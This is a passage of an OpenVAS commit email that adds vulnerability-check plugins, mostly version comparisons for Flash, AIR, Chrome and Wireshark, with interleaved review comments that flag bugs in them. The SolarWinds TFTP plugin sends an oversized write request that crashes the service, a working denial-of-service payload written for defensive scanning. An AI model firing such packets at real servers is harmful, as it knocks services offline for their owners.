[Openvas-commits] r8127 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Tue Jun 22 13:34:36 CEST 2010
Author: chandra
Date: 2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)
New Revision: 8127
Added:
trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl
trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl
trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl
trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl
trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl
trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_lin.nasl
trunk/openvas-plugins/scripts/secpod_xnview_mbm_bof_vuln_win.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/ChangeLog 2010-06-22 11:34:32 UTC (rev 8127)
@@ -1,5 +1,20 @@
2010-06-22 Chandrashekhar B <bchandra at secpod.com>
+ * scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl,
+ scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl,
+ scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl,
+ scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl,
+ scripts/secpod_xnview_mbm_bof_vuln_lin.nasl,
+ scripts/secpod_xnview_mbm_bof_vuln_win.nasl,
+ scripts/secpod_wireshark_smb_pipe_dissector_dos_vuln_win.nasl,
+ scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl,
+ scripts/secpod_wireshark_smb_dissector_dos_vuln_win.nasl,
+ scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl,
+ scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl:
+ Added new plugins.
+
+2010-06-22 Chandrashekhar B <bchandra at secpod.com>
+
* scripts/winsyslog_dos.nasl,
scripts/rpc_kcms.nasl,
scripts/hacker_defender.nasl,
Added: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,105 @@
+ ##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_adobe_prdts_mult_vuln_jun10_lin.nasl 9685 2010-06-16 142:24:34Z jun $
+#
+# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902194);
+ script_version("Revision$:1.0");
+ script_cve_id("CVE-2008-4546", "CVE-2009-3793", "CVE-2010-1297", "CVE-2010-2160",
+ "CVE-2010-2161", "CVE-2010-2162", "CVE-2010-2163", "CVE-2010-2164",
+ "CVE-2010-2165", "CVE-2010-2166", "CVE-2010-2167", "CVE-2010-2169",
+ "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2172", "CVE-2010-2173",
+ "CVE-2010-2174", "CVE-2010-2175", "CVE-2010-2176", "CVE-2010-2177",
+ "CVE-2010-2178", "CVE-2010-2179", "CVE-2010-2180", "CVE-2010-2181",
+ "CVE-2010-2182", "CVE-2010-2183", "CVE-2010-2184", "CVE-2010-2185",
+ "CVE-2010-2186", "CVE-2010-2187", "CVE-2010-2188", "CVE-2010-2189");
+ script_bugtraq_id(40759);
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_name("Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)");
+ desc = "
+ Overview: This host is installed with Adobe Flash Player/Air and is prone to
+ multiple vulnerabilities.
+
+ Vulnerability Insight:
+ The flaws are caused due to input validation errors, memory corruptions,
+ array indexing, use-after-free, integer and buffer overflows, and
+ invalid pointers when processing malformed Flash content.
+
+ Impact:
+ Successful exploitation will let the remote attackers to obtain sensitive
+ information or cause a denial of service.
+
+ Impact Level: Application/System.
+
+ Affected Software/OS:
+ Adobe AIR version prior to 2.0.2.12610,
+ Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on Linux.
+
+ Fix: Update to Adobe Air2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2,
+ http://get.adobe.com/air
+ http://www.adobe.com/support/flashplayer/downloads.html
+
+ References:
+ http://www.vupen.com/english/advisories/2010/1421
+ http://securitytracker.com/alerts/2010/Jun/1024086.html
+ http://www.adobe.com/support/security/bulletins/apsb10-14.html ";
+
+ script_description(desc);
+ script_summary("Check for the version of Adobe Flash Player/Air");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPOd");
+ script_family("General");
+ script_dependencies("gb_adobe_flash_player_detect_lin.nasl");
+ script_require_keys("AdobeFlashPlayer/Linux/Ver", "Adobe/Air/Linux/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+# Check for Adobe Flash Player
+playerVer = get_kb_item("AdobeFlashPlayer/Linux/Ver");
+if(playerVer != NULL)
+{
+ # Grep for version 10.x < 10.0.45.2, less than 9.0.277.0
+ if(version_is_less(version:playerVer, test_version2:"9.0.277.0") ||
+ version_in_range(version:playerVer, test_version:"10.0", test_version2:"10.0.45.1"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+}
+
+# Check for Adobe Air
+airVer = get_kb_item("Adobe/Air/Linux/Ver");
+if(airVer != NULL)
+{
+ # Grep for version < 2.0.2.12610
+ if(version_is_less(version:airVer, test_version:"2.0.2.12610")){
+ security_hole(0);
+ }
+}
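Review bot: The Flash Player check near the end of this script passes `test_version2:"9.0.277.0"` to `version_is_less`, while the AIR check a few lines below and the Chrome plugin in this commit call the same helper with `test_version:`; with the mismatched parameter name the 9.x comparison probably does not test against the intended value. The 10.x range also stops at 10.0.45.1, although the description string in the same file gives "10.x before 10.1.53.64" as affected, so a host on 10.0.45.2 or later 10.0/10.1 builds would go unreported. Suggested lines: `if(version_is_less(version:playerVer, test_version:"9.0.277.0") ||` and `version_in_range(version:playerVer, test_version:"10.0", test_version2:"10.1.53.63"))`, with the `# Grep for version ...` comment and the Fix text brought in line. The same two lines appear in secpod_adobe_prdts_mult_vuln_jun10_win.nasl.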
Property changes on: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_lin.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,105 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_adobe_prdts_mult_vuln_jun10_win.nasl 9685 2010-06-16 12:24:34Z jun $
+#
+# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Win)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902193);
+ script_version("Revision$:1.0");
+ script_cve_id("CVE-2008-4546", "CVE-2009-3793", "CVE-2010-1297", "CVE-2010-2160",
+ "CVE-2010-2161", "CVE-2010-2162", "CVE-2010-2163", "CVE-2010-2164",
+ "CVE-2010-2165", "CVE-2010-2166", "CVE-2010-2167", "CVE-2010-2169",
+ "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2173", "CVE-2010-2174",
+ "CVE-2010-2175", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2178",
+ "CVE-2010-2179", "CVE-2010-2180", "CVE-2010-2181", "CVE-2010-2182",
+ "CVE-2010-2183", "CVE-2010-2184", "CVE-2010-2185", "CVE-2010-2186",
+ "CVE-2010-2187", "CVE-2010-2188", "CVE-2010-2189");
+ script_bugtraq_id(40759);
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_name("Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Win)");
+ desc = "
+ Overview: This host is installed with Adobe Flash Player/Air and is prone to
+ multiple vulnerabilities.
+
+ Vulnerability Insight:
+ The flaws are caused due to input validation errors, memory corruptions,
+ array indexing, use-after-free, integer and buffer overflows, and
+ invalid pointers when processing malformed Flash content.
+
+ Impact:
+ Successful exploitation will let the attackers to obtain sensitive
+ information or cause a denial of service.
+
+ Impact Level: Application/System.
+
+ Affected Software/OS:
+ Adobe AIR version prior to 2.0.2.12610,
+ Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on windows.
+
+ Fix: Update to Adobe Air2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2,
+ http://get.adobe.com/air
+ http://www.adobe.com/support/flashplayer/downloads.html
+
+ References:
+ http://www.vupen.com/english/advisories/2010/1421
+ http://securitytracker.com/alerts/2010/Jun/1024086.html
+ http://www.adobe.com/support/security/bulletins/apsb10-14.html ";
+
+ script_description(desc);
+ script_summary("Check for the version of Adobe Flash Player/Air");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPOd");
+ script_family("General");
+ script_dependencies("gb_adobe_flash_player_detect_win.nasl");
+ script_require_keys("AdobeFlashPlayer/Win/Ver", "Adobe/Air/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+# Check for Adobe Flash Player
+playerVer = get_kb_item("AdobeFlashPlayer/Win/Ver");
+if(playerVer != NULL)
+{
+ # Grep for version 10.x < 10.0.45.2, less than 9.0.277.0
+ if(version_is_less(version:playerVer, test_version2:"9.0.277.0") ||
+ version_in_range(version:playerVer, test_version:"10.0", test_version2:"10.0.45.1"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+}
+
+# Check for Adobe Air
+airVer = get_kb_item("Adobe/Air/Win/Ver");
+if(airVer != NULL)
+{
+ # Grep for version < 2.0.2.12610
+ if(version_is_less(version:airVer, test_version:"2.0.2.12610")){
+ security_hole(0);
+ }
+}
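Review bot: `script_require_keys("AdobeFlashPlayer/Win/Ver", "Adobe/Air/Win/Ver")` lists both keys, yet the body treats the two products independently, NULL-checking each `get_kb_item` result on its own. If the scanner requires every listed key before launching the script (my understanding of script_require_keys, to be confirmed), a host with only Flash Player or only AIR is never tested. Only gb_adobe_flash_player_detect_win.nasl is named in `script_dependencies`, so whether the AIR key is populated before this script runs cannot be seen from this hunk. Consider dropping the combined key requirement or splitting the check per product, and add a comment naming the detection script that sets each key; the Linux variant has the same pattern.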
Property changes on: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mult_vuln_jun10_win.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_mult_vuln_win_jun10.nasl 9593 2010-06-17 13:55:29Z jun $
+#
+# Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902073);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2304", "CVE-2010-2303", "CVE-2010-2302" ,"CVE-2010-2301",
+ "CVE-2010-2300", "CVE-2010-2299", "CVE-2010-2297", "CVE-2010-2296",
+ "CVE-2010-2295");
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_name("Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10");
+ desc = "
+ Overview: This host is installed with Google Chrome and is prone to multiple
+ vulnerabilities.
+
+ Vulnerability Insight:
+ The flaws are caused due to:
+ - Error in 'toAlphabetic' function in 'rendering/RenderListMarker.cpp' in
+ WebCore in WebKit.
+ - Error in 'page/Geolocation.cpp' which does stop timers associated with
+ geolocation upon deletion of a document.
+ - Memory corruption in 'font' handling.
+ - Error in 'editing/markup.cpp' which fails to validate input passed to
+ 'innerHTML' property of textarea.
+ - Error in 'third_party/WebKit/WebCore/dom/Element.cpp' in 'Element::normalizeAttributes()'
+ resulting in DOM mutation events being fired.
+ - 'Clipboard::DispatchObject' function which does not properly handle
+ 'CBF_SMBITMAP objects' in a 'ViewHostMsg_ClipboardWriteObjectsAsync' message
+ which lead to illegal memory accesses and arbitrary execution related to
+ 'Type Confusion' issue.
+ - Error in 'rendering/FixedTableLayout.cpp' which leads to denial of service
+ - 'Cross-origin bypass' in DOM methods'
+ - Error in 'page/EventHandler.cpp' causes Cross-origin keystroke redirection.
+
+ Impact:
+ Successful exploitation will allow remote attackers to cause a denial of
+ service, cross-site-scripting and execution of arbitrary code.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Google Chrome version prior to 5.0.375.70 on Windows
+
+ Fix: Upgrade to Google Chrome version 5.0.375.70 or later,
+ For updates refer, http://www.google.com/chrome
+
+ References:
+ http://secunia.com/advisories/40072
+ http://code.google.com/p/chromium/issues/detail?id=43902
+ http://code.google.com/p/chromium/issues/detail?id=43304
+ http://code.google.com/p/chromium/issues/detail?id=43315
+ http://code.google.com/p/chromium/issues/detail?id=43307
+ http://googlechromereleases.blogspot.com/2010/06/stable-channel-update.html ";
+
+ script_description(desc);
+ script_summary("Check for the version of Google Chrome");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("General");
+ script_dependencies("gb_google_chrome_detect_win.nasl");
+ script_require_keys("GoogleChrome/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/Win/Ver");
+if(!chromeVer){
+ exit(0);
+}
+
+## Check for Google Chrome version < 5.0.375.70
+if(version_is_less(version:chromeVer, test_version:"5.0.375.70")){
+ security_hole(0);
+}
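Review bot: The Geolocation bullet in the description string reads "which does stop timers associated with geolocation upon deletion of a document", which describes correct behaviour rather than a flaw; presumably `which does not stop timers` was meant. The bullet `- 'Cross-origin bypass' in DOM methods'` also carries a stray closing quote. This text is what ends up in the scan report, so the inverted sentence will mislead whoever triages the finding. The version test itself (`version_is_less(... test_version:"5.0.375.70")`) agrees with the stated affected range.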
Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_mult_vuln_win_jun10.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,110 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_solarwinds_tftp_server_dos_vuln.nasl 9706 2010-06-17 13:13:13Z jun $
+#
+# SolarWinds TFTP Server Write Request Denial Of Service Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(901124);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2310");
+ script_bugtraq_id(40824);
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("SolarWinds TFTP Server Write Request Denial Of Service Vulnerability");
+ desc = "
+ Overview: This host is running SolarWinds TFTP Server and is prone to
+ denial of service vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by an error when processing TFTP write requests,
+ which can be exploited to crash the server via a specially crafted
+ request sent to UDP port 69.
+
+ Impact:
+ Successful exploitation will let the attacker to crash the server process,
+ resulting in a denial-of-service condition.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ SolarWinds TFTP Server 10.4.0.13
+
+ Fix: No solution or patch is available as on 17th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.solarwinds.com/downloads/
+
+ References:
+ http://www.exploit-db.com/exploits/13836
+ ";
+
+ script_description(desc);
+ script_summary("Determine if SolarWinds TFTP Server is prone to a denial-of-service vulnerability");
+ script_category(ACT_DENIAL);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("Denial of Service");
+ script_dependencies("tftpd_detect.nasl");
+ script_require_ports("Services/udp/tftp");
+ exit(0);
+}
+
+
+include("tftp.inc");
+
+## Not a Safe Check, exit
+if(safe_checks()){
+ exit(0);
+}
+
+## Get TFTP Port
+port = get_kb_item("Services/udp/tftp");
+if(!port){
+ port = 69;
+}
+
+## Check TFTP Port Status
+if(tftp_alive(port:port))
+{
+ ## Open UDP Socket
+ sock = open_sock_udp(port);
+ if(!sock){
+ exit(0);
+ }
+
+ ## Building Crash
+ crash = raw_string(0x00,0x02) + crap(1000) + raw_string(0x00) +
+ "NETASCII" + raw_string(0x00);
+ ## Sending Crash
+ send(socket:sock, data:crash);
+ ## Close UDP Socket
+ close(sock);
+
+ ## Check TFTP Port Status
+ if(!tftp_alive(port:port))
+ {
+ security_warning(port:port,proto:"udp");
+ exit(0);
+ }
+}
+
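Review bot: Nothing before the `send()` call establishes that the TFTP service is SolarWinds, so any server that answers `tftp_alive` receives the oversized write request and an outage is then reported under CVE-2010-2310. A single failed `tftp_alive` probe straight after the send is also taken as proof, so unless `tftp_alive` retries internally (tftp.inc is not shown) one dropped UDP reply yields a false positive. Suggest a header comment such as `## Intrusive: sends an oversized WRQ to any detected TFTP server; the service may stay down` and repeating the liveness probe after a short pause before calling `security_warning`. The `safe_checks()` exit at the top is the right guard and should stay.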
Property changes on: trunk/openvas-plugins/scripts/secpod_solarwinds_tftp_server_dos_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,82 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl 9679 2010-06-17 13:09:24Z jun $
+#
+# Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902195);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2284");
+ script_tag(name:"cvss_base", value:"8.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_name("Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to buffer overflow
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by a buffer overflow error within the 'ASN.1 BER' dissector.
+
+ Impact:
+ It has unknown impact and remote attack vectors.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Wireshark version 0.10.13 to 1.0.13 and 1.2.0 to 1.2.8 on windows.
+
+ Fix: Upgrade to Wireshark version 1.0.14 or 1.2.9:
+ For updates refer, http://www.wireshark.org/download.html
+
+ References:
+ http://secunia.com/advisories/40112
+ http://www.vupen.com/english/advisories/2010/1418
+ http://www.wireshark.org/security/wnpa-sec-2010-05.html
+ http://www.wireshark.org/security/wnpa-sec-2010-06.html
+ http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("Buffer overflow");
+ script_dependencies("gb_wireshark_detect_win.nasl");
+ script_require_keys("Wireshark/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+ exit(0);
+}
+
+# Grep for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+ version_in_range(version:sharkVer, test_version:"0.10.13", test_version2:"1.0.13")){
+ security_hole(0);
+}
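Review bot: The comment `# Grep for Wireshark version` above the final check does not say which versions are flagged, and nothing is grepped, since the value comes from the KB. Proposed replacement: `# Vulnerable: 0.10.13 - 1.0.13 and 1.2.0 - 1.2.8 (fixed in 1.0.14 / 1.2.9)`. The sigcomp_bof and sigcomp_dos scripts in this commit use the equally terse `# Check for Wireshark version` and differ from this one only in the lower bound (0.10.8 and 0.10.7), so a range comment in each would make a copy-paste slip between them much easier to spot.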
Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl 9679 2010-06-17 16:09:24Z jun $
+#
+# Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Win)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902199);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2287");
+ script_tag(name:"cvss_base", value:"8.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_name("Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Win)");
+ desc = "
+ Overview: This host is installed with Wireshark and is prone to buffer overflow
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to a buffer overflow error in the SigComp Universal
+ Decompressor Virtual Machine dissector.
+
+ Impact:
+ It has unknown impact and remote attack vectors.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Wireshark version 0.10.8 to 1.0.13 and 1.2.0 to 1.2.8
+
+ Fix: Upgrade to Wireshark version 1.0.14 or 1.2.9:
+ For updates refer, http://www.wireshark.org/download.html
+
+ References:
+ http://secunia.com/advisories/40112
+ http://www.vupen.com/english/advisories/2010/1418
+ http://www.wireshark.org/security/wnpa-sec-2010-05.html
+ http://www.wireshark.org/security/wnpa-sec-2010-06.html
+ http://www.openwall.com/lists/oss-security/2010/06/11/1 ";
+
+ script_description(desc);
+ script_summary("Check for the version of Wireshark");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 SecPod");
+ script_family("Buffer overflow");
+ script_dependencies("gb_wireshark_detect_win.nasl");
+ script_require_keys("Wireshark/Win/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+sharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!sharkVer){
+ exit(0);
+}
+
+# Check for Wireshark version
+if(version_in_range(version:sharkVer, test_version:"1.2.0", test_version2:"1.2.8") ||
+ version_in_range(version:sharkVer, test_version:"0.10.8", test_version2:"1.0.13")){
+ security_hole(0);
+}
Property changes on: trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl 2010-06-22 10:48:49 UTC (rev 8126)
+++ trunk/openvas-plugins/scripts/secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl 2010-06-22 11:34:32 UTC (rev 8127)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl 9679 2010-06-17 15:09:24Z jun $
+#
+# Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Win)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
